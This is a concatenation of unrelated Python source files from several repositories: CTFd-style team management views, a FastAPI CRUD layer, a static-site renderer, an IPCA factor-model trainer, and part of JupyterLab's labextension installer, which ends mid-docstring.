if len(team.members) == 1: team.captain_id = user.id db.session.commit() clear_user_session(user_id=user.id) clear_team_session(team_id=team.id) return redirect(url_for("challenges.listing")) else: errors.append("That information is incorrect") return render_template("teams/join_team.html", infos=infos, errors=errors) @teams.route("/teams/new", methods=["GET", "POST"]) @authed_only @require_team_mode def new(): infos = get_infos() errors = get_errors() if bool(get_config("team_creation", default=True)) is False: abort( 403, description="Team creation is currently disabled. Please join an existing team.", ) num_teams_limit = int(get_config("num_teams", default=0)) num_teams = Teams.query.filter_by(banned=False, hidden=False).count() if num_teams_limit and num_teams >= num_teams_limit: abort( 403, description=f"Reached the maximum number of teams ({num_teams_limit}). Please join an existing team.", ) user = get_current_user_attrs() if user.team_id: errors.append("You are already in a team. You cannot join another.") if request.method == "GET": team_size_limit = get_config("team_size", default=0) if team_size_limit: plural = "" if team_size_limit == 1 else "s" infos.append( "Teams are limited to {limit} member{plural}".format( limit=team_size_limit, plural=plural ) ) return render_template("teams/new_team.html", infos=infos, errors=errors) elif request.method == "POST": teamname = request.form.get("name", "").strip() passphrase = request.form.get("password", "").strip() website = request.form.get("website") affiliation = request.form.get("affiliation") user = get_current_user() existing_team = Teams.query.filter_by(name=teamname).first() if existing_team: errors.append("That team name is already taken") if not teamname: errors.append("That team name is invalid") # Process additional user fields fields = {} for field in TeamFields.query.all(): fields[field.id] = field entries = {} for field_id, field in fields.items(): value = request.form.get(f"fields[{field_id}]", "").strip() if field.required is True and (value is None or value == ""): errors.append("Please provide all required fields") break # Handle special casing of existing profile fields if field.name.lower() == "affiliation": affiliation = value break elif field.name.lower() == "website": website = value break if field.field_type == "boolean": entries[field_id] = bool(value) else: entries[field_id] = value if website: valid_website = validators.validate_url(website) else: valid_website = True if affiliation: valid_affiliation = len(affiliation) < 128 else: valid_affiliation = True if valid_website is False: errors.append("Websites must be a proper URL starting with http or https") if valid_affiliation is False: errors.append("Please provide a shorter affiliation") if errors: return render_template("teams/new_team.html", errors=errors), 403 team = Teams(name=teamname, password=<PASSWORD>, captain_id=user.id) if website: team.website = website if affiliation: team.affiliation = affiliation db.session.add(team) db.session.commit() for field_id, value in entries.items(): entry = TeamFieldEntries(field_id=field_id, value=value, team_id=team.id) db.session.add(entry) db.session.commit() user.team_id = team.id db.session.commit() clear_user_session(user_id=user.id) clear_team_session(team_id=team.id) return redirect(url_for("challenges.listing")) @teams.route("/team") @authed_only @require_team_mode def private(): infos = get_infos() errors = get_errors() user = get_current_user() if not user.team_id: return render_template("teams/team_enrollment.html") team_id = user.team_id team = Teams.query.filter_by(id=team_id).first_or_404() solves = team.get_solves() awards = team.get_awards() place = team.place score = team.score if config.is_scoreboard_frozen(): infos.append("Scoreboard has been frozen") class teams_template_info(): def __init__(self, solves, awards, user, team, score, place, infos, errors): self.solves = solves self.awards = awards self.user = user self.team = team self.score = score self.place = place self.score_frozen = config.is_scoreboard_frozen() self.infos = infos self.errors = errors information = teams_template_info(solves, awards, user, team, score, place, infos, errors) return render_template( "teams/private.html", information = information ) @teams.route("/teams/<int:team_id>") @check_account_visibility @check_score_visibility @require_team_mode def public(team_id): infos = get_infos() errors = get_errors() team = Teams.query.filter_by(id=team_id, banned=False, hidden=False).first_or_404() solves = team.get_solves() awards = team.get_awards() place = team.place score = team.score if errors: return render_template("teams/public.html", team=team, errors=errors) if config.is_scoreboard_frozen(): infos.append("Scoreboard has been frozen") return render_template( "teams/public.html", solves=solves, awards=awards, team=team, score=score, place=place, score_frozen=config.is_scoreboard_frozen(), infos=infos, errors=errors, ) ```
{ "source": "0x0elliot/prep-project-4.1.2", "score": 3 }
#### File: server/db/crud.py ```python from sqlalchemy.orm import Session from sqlalchemy.sql.expression import desc from . import models import schemas from db.database import SessionLocal # Dependency def get_db(): db = SessionLocal() try: yield db finally: db.close() def get_user(db: Session, user_id: int): return db.query(models.User).filter(models.User.id == user_id).first() def get_user_by_email(db: Session, email: str): return db.query(models.User).filter(models.User.email == email).first() def get_users(db: Session, skip: int = 0, limit: int = 100): return db.query(models.User).offset(skip).limit(limit).all() def create_user(db: Session, user: schemas.User): db_user = models.User(email=user.email, name=user.name) db.add(db_user) db.commit() db.refresh(db_user) return db_user def test_populate_db(db: Session, user: schemas.User): create_user(db, user) def get_place_by_id(db: Session, place_id: int): return db.query(models.Place).filter(models.Place.id == place_id).first() def get_places_by_tag(db: Session, tag_name: str): ans = db.query(models.Place).join(models.Place.tags).filter( models.Tag.name == tag_name).order_by(desc(models.Place.vote_count)).limit(10).all() return ans def create_vote(db: Session, user: models.User, place: models.Place): vote = models.Vote() vote.user = user place.votes.append(vote) place.vote_count += 1 db.add(vote) db.commit() db.refresh(vote) return vote def create_comment(db: Session, user: models.User, place: models.Place, body: str): comment = models.Comment(body=body) comment.user = user place.comments.append(comment) db.add(comment) db.commit() db.refresh(comment) return comment def create_webhook(db: Session, user: models.User, webhook: schemas.WebhookCreate): db_webhook = models.Webhook(trigger_name=webhook.trigger_name, url=webhook.url, type=webhook.type, place='POINT({x} {y})'.format(x=webhook.locationX, y=webhook.locationY)) db_webhook.user = user user.webhooks.append(db_webhook) db.add(db_webhook) db.commit() db.refresh(db_webhook) return db_webhook def get_webhooks(user: models.User): return user.webhooks ``` #### File: server/routers/comments.py ```python from fastapi import APIRouter, Depends, HTTPException from db.crud import get_db import schemas from sqlalchemy.orm import Session from db import crud, models from verify import get_current_user router = APIRouter() @router.post('/', response_model=schemas.Comment) async def email_subscribe(comment: schemas.CommentBase, db: Session = Depends(get_db), user: models.User = Depends(get_current_user)): place = crud.get_place_by_id(db, comment.place_id) if place is None: raise HTTPException(status_code=404, detail="Place invalid") return crud.create_comment(db, user, place, comment.body) ```
{ "source": "0x0ffff/Maverick", "score": 2 }
#### File: Maverick/Maverick/Renderer.py ```python import os from jinja2 import Environment, PackageLoader import moment import re import json from feedgen.feed import FeedGenerator from .Router import Router from .Utils import safe_write, unify_joinpath, tr from .Markdown import Markdown class Renderer: def __init__(self, config): self._config = config template = ".".join(["Templates", self._config.template]) self._env = Environment(loader=PackageLoader(template)) self._env.globals['moment'] = moment self._env.globals['config'] = self._config self._env.globals['Router'] = Router(self._config) self._env.globals['tr'] = tr from importlib import import_module self._theme = import_module(template) for k, v in self._theme .theme_globals.items(): self._env.globals[k] = v @staticmethod def markdown(content): return Markdown(content) @staticmethod def excerpt(content): def strip(text): r = re.compile(r'<[^>]+>', re.S) return r.sub('', text) excerpt = content.get_meta("excerpt") if excerpt != "": return excerpt # find <!--more--> index = content.parsed.find('<!--more-->') if index != -1: excerpt = strip(content.parsed[:index]) else: excerpt = strip(content.parsed) excerpt = excerpt[:excerpt.find('\n')] return excerpt def update_env(self, env: dict): for k, v in env.items(): self._env.globals[k] = v def render_post(self, content, prev=None, next=None): template = self._env.get_template("post.html") return template.render( content=content, content_prev=prev, content_next=next ) def render_page(self, content, prev=None, next=None): template = self._env.get_template("page.html") return template.render( content=content, content_prev=prev, content_next=next ) def render_index(self, content_list, current_page, max_pages): template = self._env.get_template("index.html") return template.render( content_list=content_list, current_page=current_page, max_pages=max_pages) def render_tags(self, content_list, current_page, max_pages, tag_name=""): template = self._env.get_template("tags.html") return template.render( tag_name=tag_name, content_list=content_list, current_page=current_page, max_pages=max_pages) def render_categories(self, content_list, current_page, max_pages, cate_name=""): template = self._env.get_template("categories.html") return template.render( cate_name=cate_name, content_list=content_list, current_page=current_page, max_pages=max_pages) def render_archives(self, content_list, current_page, max_pages): template = self._env.get_template("archives.html") return template.render( content_list=content_list, current_page=current_page, max_pages=max_pages) def render_sitemap(self, page_list, post_list): template = self._env.get_template("sitemap.xml") sitemap = template.render(page_list=page_list, post_list=post_list) safe_write( unify_joinpath(self._config.build_dir, 'sitemap.xml'), sitemap) def render_rss(self, post_list): router = Router(self._config) fg = FeedGenerator() fg.id(self._config.site_prefix) fg.title(self._config.site_name) fg.author({ 'name': self._config.author, 'email': self._config.email }) fg.link(href=self._config.site_prefix, rel='alternate') fg.logo(self._config.site_logo) fg.subtitle(self._config.description) fg.language(self._config.language) fg.lastBuildDate(moment.now().locale(self._config.locale).date) fg.pubDate(moment.now().locale(self._config.locale).date) for post in post_list[:10]: meta = post.meta fe = fg.add_entry() fe.title(meta['title']) fe.link(href=router.gen_permalink_by_meta(meta)) fe.guid(router.gen_permalink_by_meta(meta), True) fe.pubDate(meta['date'].date) fe.author({ 'name': meta['author'], 'uri': self._config.author_homepage, 'email': self._config.email }) fe.content(post.parsed) if not os.path.exists(unify_joinpath(self._config.build_dir, 'feed/atom')): os.makedirs(unify_joinpath(self._config.build_dir, 'feed/atom')) fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.xml')) fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.html')) fg.atom_file(unify_joinpath( self._config.build_dir, 'feed/atom/index.xml')) fg.atom_file(unify_joinpath( self._config.build_dir, 'feed/atom/index.html')) def render_search_cache(self, post_list, page_list): router = Router(self._config) def strip(text): r = re.compile(r'<[^>]+>', re.S) return r.sub('', text) def gen_entry(content): entry = { "title": content.get_meta('title'), "date": str(content.get_meta('date')), "path": router.gen_permalink_by_content(content), "text": strip(content.parsed), "categories": [], "tags": [] } if (content.get_meta('layout') == 'post'): for cate in content.get_meta('categories'): entry['categories'].append({ "name": cate, "slug": cate, "permalink": router.gen_permalink('category', cate, 1) }) for tag in content.get_meta('tags'): entry['tags'].append({ "name": tag, "slug": tag, "permalink": router.gen_permalink('tag', tag, 1) }) return entry posts = [gen_entry(post) for post in post_list if not post.skip] pages = [gen_entry(page) for page in page_list if not page.skip] cache = json.dumps({ "posts": posts, "pages": pages }) return cache ```
{ "source": "0x0is1/cardet", "score": 3 }
#### File: 0x0is1/cardet/main.py ```python from libcardet import libcardet as lcd def main(): vehicle_num = input(f"{lcd.tmcolors.OKCYAN}[*] Enter vehicle number to get details: {lcd.tmcolors.ENDC}") data = lcd.get_details(vehicle_num) for i in list(data): print(f"{lcd.tmcolors.OKGREEN}[+] {i}: {data[i]}{lcd.tmcolors.ENDC}") if __name__ == '__main__': main() ```
{ "source": "0x0L/fastipca", "score": 2 }
#### File: src/fastipca/fastipca.py ```python import logging import numpy as np import opt_einsum as oe import pandas as pd from scipy.sparse.linalg import svds logging.basicConfig( format="%(levelname)s: %(name)s - %(asctime)s.%(msecs)03d %(message)s", datefmt="%H:%M:%S", level=logging.INFO, ) _logger = logging.getLogger(__name__) def train( Z, R, n_factors=1, exog_factors=None, intercept=False, max_iter=1000, tol=1e-6, verbose=False, ): """Implements the IPCA algorithm by <NAME> (2017). Parameters ---------- Z : pandas.DataFrame Panel of characteristics. Columns are individual characteristics. Index must be a multi-index with time as the first component and symbols as the second component. The time component must be sorted. R : pandas.Series Panel of returns to be explained. Index must agrees with Z index. n_factors : integer number of factors to calibrate possibly 0. exog_factors : pandas.DataFrame Matrix of pre-specified factors. Index must coincide with the first level of Z index.. intercept: bool If true, a constant pre-specified factor equals to one is appended. max_iter: integer Maximum number of iterations to perform. tol : float MAE tolerance between iterations. verbose : bool If True, displays convergence info each iteration. Returns ------- gamma : pandas.DataFrame Characteristics loadings. factors : pandas.DataFrame Factor estimates. Note ---- The factor must be positive. """ if verbose: _logger.setLevel(logging.INFO) else: _logger.setLevel(logging.WARN) assert n_factors >= 0 assert max_iter >= 0 assert Z.index.equals(R.index) assert Z.index.get_level_values(0).is_monotonic_increasing _logger.info("compute interactions and covariances") ix = Z.index.remove_unused_levels() r = 1 + np.nonzero(np.diff(ix.codes[0]))[0] r = np.array([0, *r.tolist(), ix.shape[0]]) nobs = r[1:] - r[:-1] z = Z.values zr = z * R.values[:, None] Q = np.stack([zr[i:j].mean(0) for i, j in zip(r, r[1:])]) W = np.stack([z[i:j].T @ z[i:j] / (j - i) for i, j in zip(r, r[1:])]) _logger.info("initialize gamma, factors") if exog_factors is None: exog_factors_names = [] exog_factors = np.empty((ix.levels[0].shape[0], 0)) else: assert exog_factors.index.equals(ix.levels[0]) exog_factors_names = exog_factors.columns.tolist() exog_factors = exog_factors.values factor_names = list(range(n_factors)) + exog_factors_names if intercept: factor_names.append("intercept") n_all = len(factor_names) active = slice(0, n_factors) specified = slice(n_factors, n_all) gamma = np.zeros((Z.shape[1], n_all)) factors = np.zeros((exog_factors.shape[0], n_all)) f_on, f_off = factors[:, active], factors[:, specified] g_on, g_off = gamma[:, active], gamma[:, specified] if intercept: f_off[:, :-1] = exog_factors f_off[:, -1] = 1.0 else: f_off[:] = exog_factors if n_factors > 0: if n_factors == Z.shape[1]: f, s, g = np.linalg.svd(Q, full_matrices=False) else: f, s, g = svds(Q, k=n_factors) o = np.argsort(s)[::-1] g_on[:] = g[o].T f_on[:] = f[:, o] * s[o] for ite in range(max_iter): factors_old, gamma_old = f_on.copy(), gamma.copy() # factors step if n_factors > 0: m1 = oe.contract("lk,tlm,mn->tkn", g_on, W, g_on) m2 = Q @ g_on if n_factors != n_all: m2 -= oe.contract("lk,tlm,mn,tn->tk", g_on, W, g_off, f_off) f_on[:] = np.linalg.solve(m1, m2) # gamma step numer = oe.contract("tl,tf,t->lf", Q, factors, nobs).reshape(-1) denom = oe.contract("tij,tk,tl,t->ikjl", W, factors, factors, nobs) denom = denom.reshape((gamma.size, gamma.size)) gamma[:] = np.linalg.solve(denom, numer).reshape(gamma.shape) # identification if n_factors > 0: # make gamma and factors orthogonal R1 = np.linalg.cholesky(g_on.T @ g_on) R2, _, _ = np.linalg.svd(R1 @ f_on.T @ f_on @ R1.T) f_on[:] = np.linalg.solve(R2, R1 @ f_on.T).T g_on[:] = np.linalg.lstsq(g_on.T, R1.T, rcond=None)[0] @ R2 # make g_off and g_on orthogonal if n_factors != n_all: g_off[:] -= g_on @ g_on.T @ g_off f_on[:] += f_off @ g_off.T @ g_on # factors should have a positive mean sgn = np.sign(f_on.mean(0)) sgn[sgn == 0] = 1 f_on[:] *= sgn g_on[:] *= sgn # exit condition tol_f, tol_g = -np.inf, -np.inf if n_all > 0: tol_g = np.abs(gamma - gamma_old).max() if n_factors > 0: tol_f = np.abs(f_on - factors_old).max() _logger.info(f"iter={ite} tol_g={tol_g:.4} tol_f={tol_f:.4}") if max(tol_g, tol_f) < tol: break else: _logger.warning("ipca did not converge") gamma = pd.DataFrame(gamma, index=Z.columns, columns=factor_names) factors = pd.DataFrame(factors, index=ix.levels[0], columns=factor_names) return gamma, factors def predict(Z, gamma, factors): """Implements the IPCA algorithm by <NAME> (2017). Parameters ---------- Z : pandas.DataFrame Panel of characteristics. Columns are individual characteristics. Index must be a multi-index with time as the first component and symbols as the second component. The time component must be sorted. gamma : pandas.DataFrame Characteristics loadings. factors : pandas.DataFrame Factor estimates. Returns ------- pandas.Series Reconstructed values. """ rhat = Z.values @ gamma.values if factors.ndim == 1: rhat *= factors.values else: assert Z.index.levels[0].equals(factors.index) rhat *= factors.values[Z.index.codes[0]] rhat = rhat.sum(1) return pd.Series(rhat, index=Z.index) ```
{ "source": "0x0L/jupyterlab", "score": 2 }
#### File: jupyterlab/jupyterlab/labextensions.py ```python from __future__ import print_function import os import shutil import sys import tarfile from os.path import join as pjoin, normpath from jupyter_core.paths import ( jupyter_data_dir, jupyter_config_dir, jupyter_config_path, SYSTEM_JUPYTER_PATH, ENV_JUPYTER_PATH, ENV_CONFIG_PATH, SYSTEM_CONFIG_PATH ) from ipython_genutils.path import ensure_dir_exists from ipython_genutils.py3compat import string_types, cast_unicode_py2 from . import __version__ from traitlets.config.manager import BaseJSONConfigManager from traitlets.utils.importstring import import_item from tornado.log import LogFormatter from . import ( get_labextension_manifest_data_by_folder, ) # Constants for pretty print extension listing function. # Window doesn't support coloring in the commandline GREEN_ENABLED = '\033[32m enabled \033[0m' if os.name != 'nt' else 'enabled ' RED_DISABLED = '\033[31mdisabled\033[0m' if os.name != 'nt' else 'disabled' GREEN_OK = '\033[32mOK\033[0m' if os.name != 'nt' else 'ok' RED_X = '\033[31m X\033[0m' if os.name != 'nt' else ' X' #------------------------------------------------------------------------------ # Public API #------------------------------------------------------------------------------ class ArgumentConflict(ValueError): pass def check_labextension(files, user=False, prefix=None, labextensions_dir=None, sys_prefix=False): """Check whether labextension files have been installed Returns True if all files are found, False if any are missing. Parameters ---------- files : list(paths) a list of relative paths within labextensions. user : bool [default: False] Whether to check the user's .jupyter/labextensions directory. Otherwise check a system-wide install (e.g. /usr/local/share/jupyter/labextensions). prefix : str [optional] Specify install prefix, if it should differ from default (e.g. /usr/local). Will check prefix/share/jupyter/labextensions labextensions_dir : str [optional] Specify absolute path of labextensions directory explicitly. sys_prefix : bool [default: False] Install into the sys.prefix, i.e. environment """ labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir) # make sure labextensions dir exists if not os.path.exists(labext): return False if isinstance(files, string_types): # one file given, turn it into a list files = [files] return all(os.path.exists(pjoin(labext, f)) for f in files) def install_labextension(path, name, overwrite=False, symlink=False, user=False, prefix=None, labextensions_dir=None, logger=None, sys_prefix=False ): """Install a Javascript extension for JupyterLab Stages files and/or directories into the labextensions directory. By default, this compares modification time, and only stages files that need updating. If `overwrite` is specified, matching files are purged before proceeding. Parameters ---------- path : path to file, directory, zip or tarball archive, or URL to install Archives (zip or tarballs) will be extracted into the labextensions directory. name : str name the labextension is installed to. For example, if name is 'foo', then the source file will be installed to 'labextensions/foo'. overwrite : bool [default: False] If True, always install the files, regardless of what may already be installed. symlink : bool [default: False] If True, create a symlink in labextensions, rather than copying files. Not allowed with URLs or archives. Windows support for symlinks requires Vista or above, Python 3, and a permission bit which only admin users have by default, so don't rely on it. user : bool [default: False] Whether to install to the user's labextensions directory. Otherwise do a system-wide install (e.g. /usr/local/share/jupyter/labextensions). prefix : str [optional] Specify install prefix, if it should differ from default (e.g. /usr/local). Will install to ``<prefix>/share/jupyter/labextensions`` labextensions_dir : str [optional] Specify absolute path of labextensions directory explicitly. logger : Jupyter logger [optional] Logger instance to use sys_prefix : bool [default: False] Install into the sys.prefix, i.e. environment """ # the actual path to which we eventually installed full_dest = None labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir) # make sure labextensions dir exists ensure_dir_exists(labext) # forcing symlink parameter to False if os.symlink does not exist (e.g., on Windows machines running python 2) if not hasattr(os, 'symlink'): symlink = False if isinstance(path, (list, tuple)): raise TypeError("path must be a string pointing to a single extension to install; call this function multiple times to install multiple extensions") path = cast_unicode_py2(path) if path.startswith(('https://', 'http://')): raise NotImplementedError('Urls are not yet supported for labextensions') elif path.endswith('.zip') or _safe_is_tarfile(path): raise NotImplementedError('Archive files are not yet supported for labextensions') else: destination = cast_unicode_py2(name) full_dest = normpath(pjoin(labext, destination)) if overwrite and os.path.lexists(full_dest): if logger: logger.info("Removing: %s" % full_dest) if os.path.isdir(full_dest) and not os.path.islink(full_dest): shutil.rmtree(full_dest) else: os.remove(full_dest) if symlink: path = os.path.abspath(path) if not os.path.exists(full_dest): if logger: logger.info("Symlinking: %s -> %s" % (full_dest, path)) os.symlink(path, full_dest) elif os.path.isdir(path): path = pjoin(os.path.abspath(path), '') # end in path separator for parent, dirs, files in os.walk(path): dest_dir = pjoin(full_dest, parent[len(path):]) if not os.path.exists(dest_dir): if logger: logger.info("Making directory: %s" % dest_dir) os.makedirs(dest_dir) for file in files: src = pjoin(parent, file) dest_file = pjoin(dest_dir, file) _maybe_copy(src, dest_file, logger=logger) else: src = path _maybe_copy(src, full_dest, logger=logger) return full_dest def install_labextension_python(module, overwrite=False, symlink=False, user=False, sys_prefix=False, prefix=None, labextensions_dir=None, logger=None): """Install a labextension bundled in a Python package. Returns a list of installed/updated directories. See install_labextension for parameter information.""" m, labexts = _get_labextension_metadata(module) base_path = os.path.split(m.__file__)[0] full_dests = [] for labext in labexts: src = os.path.join(base_path, labext['src']) name = labext['name'] if logger: logger.info("Installing %s -> %s" % (src, name)) full_dest = install_labextension( src, name=name, overwrite=overwrite, symlink=symlink, user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir, logger=logger ) validate_labextension_folder(name, full_dest, logger) full_dests.append(full_dest) return full_dests def uninstall_labextension(name, user=False, sys_prefix=False, prefix=None, labextensions_dir=None, logger=None): """Uninstall a Javascript extension of JupyterLab Removes staged files and/or directories in the labextensions directory and removes the extension from the frontend config. Parameters ---------- name: str The name of the labextension. user : bool [default: False] Whether to uninstall from the user's labextensions directory. Otherwise do a system-wide uninstall (e.g. /usr/local/share/jupyter/labextensions). sys_prefix : bool [default: False] Uninstall from the sys.prefix, i.e. environment prefix : str [optional] Specify prefix, if it should differ from default (e.g. /usr/local). Will uninstall from ``<prefix>/share/jupyter/labextensions`` labextensions_dir : str [optional] Specify absolute path of labextensions directory explicitly. logger : Jupyter logger [optional] Logger instance to use """ labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir) dest = cast_unicode_py2(name) full_dest = pjoin(labext, dest) if os.path.lexists(full_dest): if logger: logger.info("Removing: %s" % full_dest) if os.path.isdir(full_dest) and not os.path.islink(full_dest): shutil.rmtree(full_dest) else: os.remove(full_dest) disable_labextension(name, user=user, sys_prefix=sys_prefix, logger=logger) def uninstall_labextension_python(module, user=False, sys_prefix=False, prefix=None, labextensions_dir=None, logger=None): """Uninstall a labextension bundled in a Python package. See parameters of `install_labextension_python` """ m, labexts = _get_labextension_metadata(module) for labext in labexts: name = labext['name'] if logger: logger.info("Uninstalling {}".format(name)) uninstall_labextension(name, user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir, logger=logger) def _set_labextension_state(name, state, user=True, sys_prefix=False, logger=None): """Set whether the JupyterLab frontend should use the named labextension Returns True if the final state is the one requested. Parameters name : string The name of the extension. state : bool The state in which to leave the extension user : bool [default: True] Whether to update the user's .jupyter/labextensions directory sys_prefix : bool [default: False] Whether to update the sys.prefix, i.e. environment. Will override `user`. logger : Jupyter logger [optional] Logger instance to use """ user = False if sys_prefix else user config_dir = os.path.join( _get_config_dir(user=user, sys_prefix=sys_prefix), 'labconfig') cm = BaseJSONConfigManager(config_dir=config_dir) if logger: logger.info("{} extension {}...".format( "Enabling" if state else "Disabling", name )) cfg = cm.get("jupyterlab_config") labextensions = ( cfg.setdefault("LabApp", {}) .setdefault("labextensions", {}) ) old_enabled = labextensions.get(name, None) new_enabled = state if state is not None else not old_enabled if logger: if new_enabled: logger.info(u"Enabling: %s" % (name)) else: logger.info(u"Disabling: %s" % (name)) labextensions[name] = new_enabled if logger: logger.info(u"- Writing config: {}".format(config_dir)) cm.update("jupyterlab_config", cfg) if new_enabled: validate_labextension(name, logger=logger) return old_enabled == state def _set_labextension_state_python(state, module, user, sys_prefix, logger=None): """Enable or disable some labextensions stored in a Python package Returns a list of whether the state was achieved (i.e. changed, or was already right) Parameters ---------- state : Bool Whether the extensions should be enabled module : str Importable Python module exposing the magic-named `_jupyter_labextension_paths` function user : bool Whether to enable in the user's labextensions directory. sys_prefix : bool Enable/disable in the sys.prefix, i.e. environment logger : Jupyter logger [optional] Logger instance to use """ m, labexts = _get_labextension_metadata(module) return [_set_labextension_state(name=labext["name"], state=state, user=user, sys_prefix=sys_prefix, logger=logger) for labext in labexts] def enable_labextension(name, user=True, sys_prefix=False, logger=None): """Enable a named labextension Returns True if the final state is the one requested. Parameters ---------- name : string The name of the extension. user : bool [default: True] Whether to enable in the user's labextensions directory. sys_prefix : bool [default: False] Whether to enable in the sys.prefix, i.e. environment. Will override `user` logger : Jupyter logger [optional] Logger instance to use """ return _set_labextension_state(name=name, state=True, user=user, sys_prefix=sys_prefix, logger=logger) def disable_labextension(name, user=True, sys_prefix=False, logger=None): """Disable a named labextension Returns True if the final state is the one requested. Parameters ---------- name : string The name of the extension. user : bool [default: True] Whether to enable in the user's labextensions directory. sys_prefix : bool [default: False] Whether to enable in the sys.prefix, i.e. environment. Will override `user`. logger : Jupyter logger [optional] Logger instance to use """ return _set_labextension_state(name=name, state=False, user=user, sys_prefix=sys_prefix, logger=logger) def enable_labextension_python(module, user=True, sys_prefix=False, logger=None): """Enable some labextensions associated with a Python module. Returns a list of whether the state was achieved (i.e. changed, or was already right) Parameters ---------- module : str Importable Python module exposing the magic-named `_jupyter_labextension_paths` function user : bool [default: True] Whether to enable in the user's labextensions directory. sys_prefix : bool [default: False] Whether to enable in the sys.prefix, i.e. environment. Will override `user` logger : Jupyter logger [optional] Logger instance to use """ return _set_labextension_state_python(True, module, user, sys_prefix, logger=logger) def disable_labextension_python(module, user=True, sys_prefix=False, logger=None): """Disable some labextensions associated with a Python module. Returns True if the final state is the one requested. Parameters ---------- module : str Importable Python module exposing the magic-named `_jupyter_labextension_paths` function user : bool [default: True] Whether to enable in the user's labextensions directory. sys_prefix : bool [default: False] Whether to enable in the sys.prefix, i.e. environment logger : Jupyter logger [optional] Logger instance to use """ return _set_labextension_state_python(False, module, user, sys_prefix, logger=logger) def validate_labextension(name, logger=None): """Validate a named labextension. Looks across all of the labextension directories. Returns a list of warnings. Parameters ---------- name : str The name of the extension. logger : Jupyter logger [optional] Logger instance to use """ for exts in _labextension_dirs(): full_dest = os.path.join(exts, name) if os.path.exists(full_dest): return validate_labextension_folder(name, full_dest, logger) def validate_labextension_folder(name, full_dest, logger=None): """Assess the health of an installed labextension Returns a list of warnings. Parameters ---------- full_dest : str The on-disk location of the installed labextension: this should end with `labextensions/<name>` logger : Jupyter logger [optional] Logger instance to use """ if logger: logger.info(" - Validating...") infos = [] warnings = [] hasFiles = True hasEntry = False data = get_labextension_manifest_data_by_folder(full_dest) for manifest in data.values(): if ('entry' in manifest and 'modules' in manifest): if (manifest['entry'] in manifest['modules']): hasEntry = True files = manifest.get('files', []) if not files: hasFiles = False for fname in files: path = os.path.join(full_dest, fname) if not os.path.exists(path): hasFiles = False entry_msg = u" {} has {} entry point?" name = os.path.basename(full_dest) if hasEntry: (entry_msg.format(GREEN_OK, name)) else: warnings.append(entry_msg.format(RED_X, name)) files_msg = u" {} has necessary files?" if hasFiles: infos.append(files_msg.format(GREEN_OK, name)) else: warnings.append(files_msg.format(RED_X, name)) post_mortem = u" {} {} {}" if logger: if warnings: [logger.info(info) for info in infos] [logger.warn(warning) for warning in warnings] else: logger.info(post_mortem.format(name, "", GREEN_OK)) return warnings #---------------------------------------------------------------------- # Applications #---------------------------------------------------------------------- from traitlets import Bool, Unicode from jupyter_core.application import JupyterApp _base_flags = {} _base_flags.update(JupyterApp.flags) _base_flags.pop("y", None) _base_flags.pop("generate-config", None) _base_flags.update({ "user" : ({ "BaseLabExtensionApp" : { "user" : True, }}, "Apply the operation only for the given user" ), "system" : ({ "BaseLabExtensionApp" : { "user" : False, "sys_prefix": False, }}, "Apply the operation system-wide" ), "sys-prefix" : ({ "BaseLabExtensionApp" : { "sys_prefix" : True, }}, "Use sys.prefix as the prefix for installing labextensions (for environments, packaging)" ), "py" : ({ "BaseLabExtensionApp" : { "python" : True, }}, "Install from a Python package" ) }) _base_flags['python'] = _base_flags['py'] class BaseLabExtensionApp(JupyterApp): """Base labextension installer app""" _log_formatter_cls = LogFormatter flags = _base_flags version = __version__ user = Bool(False, config=True, help="Whether to do a user install") sys_prefix = Bool(False, config=True, help="Use the sys.prefix as the prefix") python = Bool(False, config=True, help="Install from a Python package") def _log_format_default(self): """A default format for messages""" return "%(message)s" flags = {} flags.update(_base_flags) flags.update({ "overwrite" : ({ "InstallLabExtensionApp" : { "overwrite" : True, }}, "Force overwrite of existing files" ), "symlink" : ({ "InstallLabExtensionApp" : { "symlink" : True, }}, "Create symlink instead of copying files" ), }) flags['s'] = flags['symlink'] aliases = { "prefix" : "InstallLabExtensionApp.prefix", "labextensions" : "InstallLabExtensionApp.labextensions_dir", } class InstallLabExtensionApp(BaseLabExtensionApp): """Entry point for installing JupyterLab extensions""" description = """Install JupyterLab extensions Usage jupyter labextension install /path/to/myextension myextension [--user|--sys-prefix] jupyter labextension install --py myextensionPyPackage [--user|--sys-prefix] This copies a file or a folder into the Jupyter labextensions directory. If a URL is given, it will be downloaded. If an archive is given, it will be extracted into labextensions. If the requested files are already up to date, no action is taken unless --overwrite is specified. """ examples = """ jupyter labextension install /path/to/myextension myextension jupyter labextension install --py myextensionPyPackage """ aliases = aliases flags = flags overwrite = Bool(False, config=True, help="Force overwrite of existing files") symlink = Bool(False, config=True, help="Create symlinks instead of copying files") prefix = Unicode('', config=True, help="Installation prefix") labextensions_dir = Unicode('', config=True, help="Full path to labextensions dir (probably use prefix or user)") def _config_file_name_default(self): """The default config file name.""" return 'jupyterlab_config' def install_extensions(self): """Perform the installation of labextension(s)""" if self.python: if len(self.extra_args) > 1: raise ValueError("Only one labextension allowed at a time. " "Call multiple times to install multiple extensions.") install = install_labextension_python kwargs = {} else: if len(self.extra_args) > 2: raise ValueError("Only one labextension allowed at a time. " "Call multiple times to install multiple extensions.") install = install_labextension kwargs = {'name': self.extra_args[1]} full_dests = install(self.extra_args[0], overwrite=self.overwrite, symlink=self.symlink, user=self.user, sys_prefix=self.sys_prefix, prefix=self.prefix, labextensions_dir=self.labextensions_dir, logger=self.log, **kwargs ) if full_dests: self.log.info( u"\nTo enable this labextension in the browser every time" " JupyterLab loads:\n\n" " jupyter labextension enable {}{}{}{}\n".format( self.extra_args[0] if self.python else self.extra_args[1], " --user" if self.user else "", " --py" if self.python else "", " --sys-prefix" if self.sys_prefix else "" ) ) def start(self): """Perform the App's function as configured""" if not self.extra_args: sys.exit('Please specify a labextension to install') else: try: self.install_extensions() except ArgumentConflict as e: sys.exit(str(e)) class UninstallLabExtensionApp(BaseLabExtensionApp): """Entry point for uninstalling JupyterLab extensions""" version = __version__ description = """Uninstall Jupyterlab extensions Usage jupyter labextension uninstall myextension jupyter labextension uninstall 